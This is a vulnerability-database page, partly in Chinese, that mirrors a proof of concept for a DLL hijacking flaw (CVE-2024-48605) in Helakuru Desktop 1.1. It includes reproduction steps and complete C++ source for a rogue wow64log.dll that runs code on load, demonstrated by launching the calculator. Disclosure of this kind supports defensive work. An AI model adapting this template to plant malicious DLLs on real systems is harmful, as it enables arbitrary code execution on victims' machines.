漏洞平台

POC详情： 290bd1c52981777c7284eb32b1c9a88195c99378

来源

https://github.com/surajhacx/HelakuruV.1.1-DLLHijack

关联漏洞

标题： Helakuru 安全漏洞 (CVE-2024-48605)
描述：Helakuru是斯里兰卡Helakuru公司的一款 Android 键盘。 Helakuru v1.1版本存在安全漏洞，该漏洞源于没有对wow64log.dll文件进行适当的验证，本地攻击者可以执行任意代码。

描述

Helakuru Version 1.1 DLL Hijack - CVE-2024-48605

介绍

**DLL Hijacking Vulnerability in Helakuru**
---

**Summary**

The Helakuru Desktop version 1.1v operates on both 64-bit and 32-bit architectures. During testing, it was identified that the program attempts to load wow64log.dll, which is not included by default in modern Windows operating systems. This results in a 'Name not found' error, exposing the program to a DLL Hijacking vulnerability. By crafting a malicious wow64log.dll, arbitrary code execution can be achieved.

**Affected Version**

Helakuru Desktop 1.1v

**Steps to Reproduce**

1. Monitor DLL Loading with ProcMon
 * ProcMon showing the CreateFile operation with "Name not found" for wow64log.dll
   ![Pasted image 20240925232040](https://github.com/user-attachments/assets/e3f552d8-bb3c-4c61-87ef-8a1dd5fa9bf0)

2. Create a Malicious wow64log.dll
``` C++
#include <windows.h>
#include <stdio.h>

void LaunchCalculator()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    const char* calcCmd = "C:\\Windows\\System32\\calc.exe";

    if (!CreateProcessA(
        NULL,          
        (LPSTR)calcCmd, 
        NULL,          
        NULL,          
        FALSE,         
        0,             
        NULL,          
        NULL,          
        &si,           
        &pi))          
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
    }
    else
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchCalculator();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

3. Run Helakuru Desktop
 * Launch Helakuru Desktop again. The malicious wow64log.dll will now be loaded into the program, triggering the Calculator as a demonstration of successful DLL injection.
 ![Pasted image 20240925233737](https://github.com/user-attachments/assets/d01f179e-e09d-45e1-8b04-2922102f7b69)

4. Verify DLL Load using ProcMon
 * Reopen ProcMon and observe that the wow64log.dll is successfully loaded this time, confirming that the custom DLL has been executed by the program.
   ![Pasted image 20240925232728](https://github.com/user-attachments/assets/985f373f-9e7a-4d4b-b3d3-0bed98710be4)

**Impact**: This vulnerability allows for arbitrary code execution.

文件快照


 [4.0K]  /data/pocs/290bd1c52981777c7284eb32b1c9a88195c99378
├── [1.0K]  LICENSE
└── [2.5K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。